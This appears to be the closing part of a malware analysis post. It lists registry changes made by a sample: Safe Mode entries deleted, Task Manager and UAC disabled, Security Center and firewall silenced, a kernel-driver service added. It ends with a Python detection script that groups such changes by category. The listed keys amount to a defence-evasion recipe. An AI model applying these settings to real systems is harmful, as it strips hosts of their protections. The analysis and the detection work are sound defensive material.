- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\WinMgmt\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\WZCSVC\ REG_SZ 16 "Service"
- // Newly added registry keys/values:
- HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline REG_DWORD 4 0x0
- HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools REG_DWORD 4 0x1
- HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgr REG_DWORD 4 0x1
- HKLM\Software\Microsoft\Security Center\Svc\AntiVirusDisableNotify REG_DWORD 4 0x1
- HKLM\Software\Microsoft\Security Center\Svc\AntiVirusOverride REG_DWORD 4 0x1
- HKLM\Software\Microsoft\Security Center\Svc\FirewallDisableNotify REG_DWORD 4 0x1
- HKLM\Software\Microsoft\Security Center\Svc\FirewallOverride REG_DWORD 4 0x1
- HKLM\Software\Microsoft\Security Center\Svc\UacDisableNotify REG_DWORD 4 0x1
- HKLM\Software\Microsoft\Security Center\Svc\UpdatesDisableNotify REG_DWORD 4 0x1
- HKLM\Software\Microsoft\Security Center\UacDisableNotify REG_DWORD 4 0x1
- HKLM\Software\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA REG_DWORD 4 0x0
- HKLM\System\CurrentControlSet\Services\amsint32\DisplayName REG_SZ 18 "amsint32"
- HKLM\System\CurrentControlSet\Services\amsint32\Enum\0 REG_SZ 52 "Root\LEGACY_AMSINT32\0000"
- HKLM\System\CurrentControlSet\Services\amsint32\Enum\Count REG_DWORD 4 0x1
- HKLM\System\CurrentControlSet\Services\amsint32\Enum\NextInstance REG_DWORD 4 0x1
- HKLM\System\CurrentControlSet\Services\amsint32\ErrorControl REG_DWORD 4 0x1
- HKLM\System\CurrentControlSet\Services\amsint32\ImagePath REG_EXPAND_SZ 84 "C:\WINDOWS\system32\drivers\iurln.sys"
- HKLM\System\CurrentControlSet\Services\amsint32\Security\Security REG_BINARY 168 ?
- HKLM\System\CurrentControlSet\Services\amsint32\Start REG_DWORD 4 0x3
- HKLM\System\CurrentControlSet\Services\amsint32\Type REG_DWORD 4 0x1
- HKLM\System\CurrentControlSet\Services\IpFilterDriver\Enum\0 REG_SZ 64 "Root\LEGACY_IPFILTERDRIVER\0000"
- HKLM\System\CurrentControlSet\Services\IpFilterDriver\Enum\Count REG_DWORD 4 0x1
- HKLM\System\CurrentControlSet\Services\IpFilterDriver\Enum\NextInstance REG_DWORD 4 0x1
- HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Program Files\Microsoft\WaterMark.exe REG_SZ 114 "C:\Program Files\Microsoft\WaterMark.exe:*:Enabled:ipsec"
- HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:%MALWARESAMPLE% REG_SZ 70 "C:\TEST\sample.exe:*:Enabled:ipsec"
- HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications REG_DWORD 4 0x1
- HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions REG_DWORD 4 0x0
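- Added example (not code from the paste): detection logic that groups a registry diff in the format above by what each change does to the host's defences (Safe Mode list gutted, admin tools locked out, UAC and Security Center silenced, firewall exception added, new kernel-driver service). The sample lines are a subset of the ones listed above plus one constructed benign entry; the rule names and groupings are this example's own.

```python
"""Group sandbox registry-diff lines by what they do to the host's defences.
Added example, not from the original paste. Input format is the one used in the
analysis above ("<path> <REG_TYPE> <size> <value>"). The sample lines are a
subset of those listed there plus one constructed benign Explorer entry; the
rule names and groupings are this example's own."""
import re
from collections import defaultdict

LINE = re.compile(r"^(?P<path>.+?)\s+(?P<type>REG_[A-Z_]+)\s+(?P<size>\d+)(?:\s+(?P<value>.*))?$")
SAFEBOOT = re.compile(r"\\Control\\SafeBoot\\", re.I)

DELETED = r"""
HKLM\System\CurrentControlSet\Control\SafeBoot\AlternateShell REG_SZ 16 "cmd.exe"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\EventLog\ REG_SZ 16 "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Tcpip\ REG_SZ 16 "Service"
"""

ADDED = r"""
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools REG_DWORD 4 0x1
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgr REG_DWORD 4 0x1
HKLM\Software\Microsoft\Security Center\Svc\AntiVirusOverride REG_DWORD 4 0x1
HKLM\Software\Microsoft\Security Center\Svc\FirewallDisableNotify REG_DWORD 4 0x1
HKLM\Software\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA REG_DWORD 4 0x0
HKLM\System\CurrentControlSet\Services\amsint32\ImagePath REG_EXPAND_SZ 84 "C:\WINDOWS\system32\drivers\iurln.sys"
HKLM\System\CurrentControlSet\Services\amsint32\Type REG_DWORD 4 0x1
HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Program Files\Microsoft\WaterMark.exe REG_SZ 114 "C:\Program Files\Microsoft\WaterMark.exe:*:Enabled:ipsec"
HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions REG_DWORD 4 0x0
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden REG_DWORD 4 0x1
"""

# (category, path pattern, value predicate) for ADDED entries; paths are matched
# case-insensitively because the diff mixes "Policies" and "policies".
RULES = [
    ("disables-admin-tools", r"\\Policies\\system\\(DisableTaskMgr|DisableRegistryTools)$", lambda v: v == "0x1"),
    ("disables-uac", r"\\policies\\system\\EnableLUA$", lambda v: v == "0x0"),
    ("silences-security-center", r"\\Security Center\\(Svc\\)?\w+(Override|DisableNotify)$", lambda v: v == "0x1"),
    ("firewall-exception-added", r"\\FirewallPolicy\\.*\\AuthorizedApplications\\List\\", lambda v: ":Enabled:" in v),
    ("firewall-exceptions-allowed", r"\\FirewallPolicy\\.*\\DoNotAllowExceptions$", lambda v: v == "0x0"),
    ("new-kernel-driver", r"\\Services\\[^\\]+\\ImagePath$", lambda v: v.lower().endswith(".sys")),
    ("new-kernel-driver", r"\\Services\\[^\\]+\\Type$", lambda v: v == "0x1"),   # SERVICE_KERNEL_DRIVER
]


def parse(text: str) -> list:
    """Parse non-empty diff lines into dicts; lines that do not fit keep only the raw path."""
    rows = []
    for raw in text.strip().splitlines():
        m = LINE.match(raw)
        rows.append(m.groupdict() if m else {"path": raw, "type": None, "size": None, "value": None})
    return rows


def triage(deleted: str, added: str) -> dict:
    """Return {category: [entries]} for the deleted and added registry entries."""
    hits = defaultdict(list)
    safeboot = [e["path"] for e in parse(deleted) if SAFEBOOT.search(e["path"])]
    if safeboot:                               # Safe Mode driver/service list removed
        hits["safe-mode-sabotage"] = safeboot
    for e in parse(added):
        value = (e["value"] or "").strip('"')
        for cat, pat, pred in RULES:
            if re.search(pat, e["path"], re.I) and pred(value):
                hits[cat].append(e["path"].rsplit("\\", 1)[-1] + " = " + value)
                break
        else:
            hits["unclassified"].append(e["path"])
    return dict(hits)


if __name__ == "__main__":
    for cat, entries in triage(DELETED, ADDED).items():
        print(cat, "->", entries)
```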
- ----
- #MalwareMustDie!
- @unixfreaxjp